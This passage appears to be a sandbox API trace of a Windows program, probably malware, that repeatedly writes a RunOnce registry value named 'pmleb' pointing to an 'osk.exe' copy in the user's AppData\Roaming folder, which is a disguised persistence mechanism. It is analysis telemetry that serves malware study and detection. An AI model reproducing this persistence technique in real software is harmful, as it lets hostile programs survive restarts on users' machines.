(lpMsg=0x33f7fc) returned 0 [0104.962] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.962] KillTimer (hWnd=0x20280, uIDEvent=0x2406) returned 1 [0104.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.963] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.963] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.963] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.963] RegCloseKey (hKey=0x280) returned 0x0 [0104.964] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.964] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.964] SetTimer (hWnd=0x20280, nIDEvent=0x2407, uElapse=0xa, lpTimerFunc=0x0) returned 0x2407 [0104.964] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.000] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.000] KillTimer (hWnd=0x20280, uIDEvent=0x2407) returned 1 [0105.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.001] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.001] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.001] RegCloseKey (hKey=0x280) returned 0x0 [0105.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.002] SetTimer (hWnd=0x20280, nIDEvent=0x2408, uElapse=0xa, lpTimerFunc=0x0) returned 0x2408 [0105.002] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.010] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.010] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.010] KillTimer (hWnd=0x20280, uIDEvent=0x2408) returned 1 [0105.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.011] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.011] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.011] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.011] RegCloseKey (hKey=0x280) returned 0x0 [0105.011] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.011] SetTimer (hWnd=0x20280, nIDEvent=0x2409, uElapse=0xa, lpTimerFunc=0x0) returned 0x2409 [0105.011] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.025] KillTimer (hWnd=0x20280, uIDEvent=0x2409) returned 1 [0105.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.026] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.026] RegCloseKey (hKey=0x280) returned 0x0 [0105.026] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.027] SetTimer (hWnd=0x20280, nIDEvent=0x240a, uElapse=0xa, lpTimerFunc=0x0) returned 0x240a [0105.027] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.040] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.040] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.040] KillTimer (hWnd=0x20280, uIDEvent=0x240a) returned 1 [0105.041] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.041] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.041] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.041] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.042] RegCloseKey (hKey=0x280) returned 0x0 [0105.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.042] SetTimer (hWnd=0x20280, nIDEvent=0x240b, uElapse=0xa, lpTimerFunc=0x0) returned 0x240b [0105.042] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.056] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.056] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.056] KillTimer (hWnd=0x20280, uIDEvent=0x240b) returned 1 [0105.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.057] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.057] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.057] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.058] RegCloseKey (hKey=0x280) returned 0x0 [0105.058] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.058] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.058] SetTimer (hWnd=0x20280, nIDEvent=0x240c, uElapse=0xa, lpTimerFunc=0x0) returned 0x240c [0105.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.074] KillTimer (hWnd=0x20280, uIDEvent=0x240c) returned 1 [0105.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.076] RegCloseKey (hKey=0x280) returned 0x0 [0105.076] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.076] SetTimer (hWnd=0x20280, nIDEvent=0x240d, uElapse=0xa, lpTimerFunc=0x0) returned 0x240d [0105.076] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.087] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.088] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.088] KillTimer (hWnd=0x20280, uIDEvent=0x240d) returned 1 [0105.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.088] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.088] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.089] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.089] RegCloseKey (hKey=0x280) returned 0x0 [0105.089] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.089] SetTimer (hWnd=0x20280, nIDEvent=0x240e, uElapse=0xa, lpTimerFunc=0x0) returned 0x240e [0105.089] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.103] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.103] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.103] KillTimer (hWnd=0x20280, uIDEvent=0x240e) returned 1 [0105.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.103] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.104] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.104] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.104] RegCloseKey (hKey=0x280) returned 0x0 [0105.104] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.104] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.104] SetTimer (hWnd=0x20280, nIDEvent=0x240f, uElapse=0xa, lpTimerFunc=0x0) returned 0x240f [0105.104] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.118] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.118] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.119] KillTimer (hWnd=0x20280, uIDEvent=0x240f) returned 1 [0105.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.119] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.120] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.120] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.120] RegCloseKey (hKey=0x280) returned 0x0 [0105.120] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.120] SetTimer (hWnd=0x20280, nIDEvent=0x2410, uElapse=0xa, lpTimerFunc=0x0) returned 0x2410 [0105.120] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.135] KillTimer (hWnd=0x20280, uIDEvent=0x2410) returned 1 [0105.136] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.136] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.136] RegCloseKey (hKey=0x280) returned 0x0 [0105.137] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.137] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.137] SetTimer (hWnd=0x20280, nIDEvent=0x2411, uElapse=0xa, lpTimerFunc=0x0) returned 0x2411 [0105.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.150] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.150] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.150] KillTimer (hWnd=0x20280, uIDEvent=0x2411) returned 1 [0105.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.151] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.151] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.151] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.151] RegCloseKey (hKey=0x280) returned 0x0 [0105.151] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.152] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.152] SetTimer (hWnd=0x20280, nIDEvent=0x2412, uElapse=0xa, lpTimerFunc=0x0) returned 0x2412 [0105.152] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.166] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.166] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.166] KillTimer (hWnd=0x20280, uIDEvent=0x2412) returned 1 [0105.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.167] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.168] RegCloseKey (hKey=0x280) returned 0x0 [0105.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.168] SetTimer (hWnd=0x20280, nIDEvent=0x2413, uElapse=0xa, lpTimerFunc=0x0) returned 0x2413 [0105.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.181] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.181] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.181] KillTimer (hWnd=0x20280, uIDEvent=0x2413) returned 1 [0105.181] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.182] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.182] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.182] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.182] RegCloseKey (hKey=0x280) returned 0x0 [0105.182] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.182] SetTimer (hWnd=0x20280, nIDEvent=0x2414, uElapse=0xa, lpTimerFunc=0x0) returned 0x2414 [0105.182] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.196] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.196] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.196] KillTimer (hWnd=0x20280, uIDEvent=0x2414) returned 1 [0105.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.197] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.197] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.198] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.198] RegCloseKey (hKey=0x280) returned 0x0 [0105.198] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.198] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.198] SetTimer (hWnd=0x20280, nIDEvent=0x2415, uElapse=0xa, lpTimerFunc=0x0) returned 0x2415 [0105.198] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.212] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.212] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.212] KillTimer (hWnd=0x20280, uIDEvent=0x2415) returned 1 [0105.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.213] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.213] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.213] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.214] RegCloseKey (hKey=0x280) returned 0x0 [0105.214] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.214] SetTimer (hWnd=0x20280, nIDEvent=0x2416, uElapse=0xa, lpTimerFunc=0x0) returned 0x2416 [0105.214] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.228] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.228] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.228] KillTimer (hWnd=0x20280, uIDEvent=0x2416) returned 1 [0105.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.229] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.229] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.229] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.229] RegCloseKey (hKey=0x280) returned 0x0 [0105.229] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.229] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.229] SetTimer (hWnd=0x20280, nIDEvent=0x2417, uElapse=0xa, lpTimerFunc=0x0) returned 0x2417 [0105.230] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.244] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.244] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.244] KillTimer (hWnd=0x20280, uIDEvent=0x2417) returned 1 [0105.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.245] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.245] RegCloseKey (hKey=0x280) returned 0x0 [0105.246] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.246] SetTimer (hWnd=0x20280, nIDEvent=0x2418, uElapse=0xa, lpTimerFunc=0x0) returned 0x2418 [0105.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.259] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.259] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.259] KillTimer (hWnd=0x20280, uIDEvent=0x2418) returned 1 [0105.259] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.260] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.260] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.260] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 